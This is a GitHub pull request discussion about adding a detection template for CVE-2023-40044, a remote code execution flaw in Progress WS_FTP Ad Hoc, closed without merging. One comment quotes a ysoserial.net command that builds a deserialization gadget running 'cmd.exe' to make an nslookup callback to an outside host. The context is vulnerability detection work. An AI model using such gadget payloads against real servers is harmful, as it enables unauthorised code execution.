Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CVE-2023-40044 #8296

Closed
wants to merge 0 commits into from
Closed

CVE-2023-40044 #8296

wants to merge 0 commits into from

Conversation

johnk3r
Copy link
Contributor

@johnk3r johnk3r commented Oct 1, 2023

Template / PR Information

RCE in Progress WS_FTP Ad Hoc via IIS HTTP Modules

References:
https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044

I've validated this template locally:
Needs some improvements and payload generation/validation.

@DhiyaneshGeek DhiyaneshGeek self-assigned this Oct 1, 2023
@ehsandeep
Copy link
Member

@johnk3r this will require payload generation from https://github.com/pwntester/ysoserial.net

@ehsandeep ehsandeep mentioned this pull request Oct 1, 2023
Open
@johnk3r
Copy link
Contributor Author

johnk3r commented Oct 1, 2023

@johnk3r this will require payload generation from https://github.com/pwntester/ysoserial.net

Thank you for the warning. I noticed that something wasn't right with "generate_java_gadget".

@AkechiShiro
Copy link

@ehsandeep could you describe a bit more what's needed for the payload generation needed from ysoerial ?

Because there is a plugin DotNetNuke (targeting an old CVE) that exist and there are also a lot of gadgets (that can be generated)

@AkechiShiro
Copy link

Found an example in the ref linked here : ./ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "cmd.exe /C nslookup wuui3r1tbpx4pwl6ao5dztkiq9w2ks8h.oastify.com" -o base64

@DhiyaneshGeek DhiyaneshGeek added the Status: On Hold Similar to blocked, but is assigned to someone label Oct 18, 2023
@johnk3r johnk3r closed this Nov 14, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@DhiyaneshGeek DhiyaneshGeek

Labels
Status: On Hold Similar to blocked, but is assigned to someone
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@johnk3r @ehsandeep @AkechiShiro @DhiyaneshGeek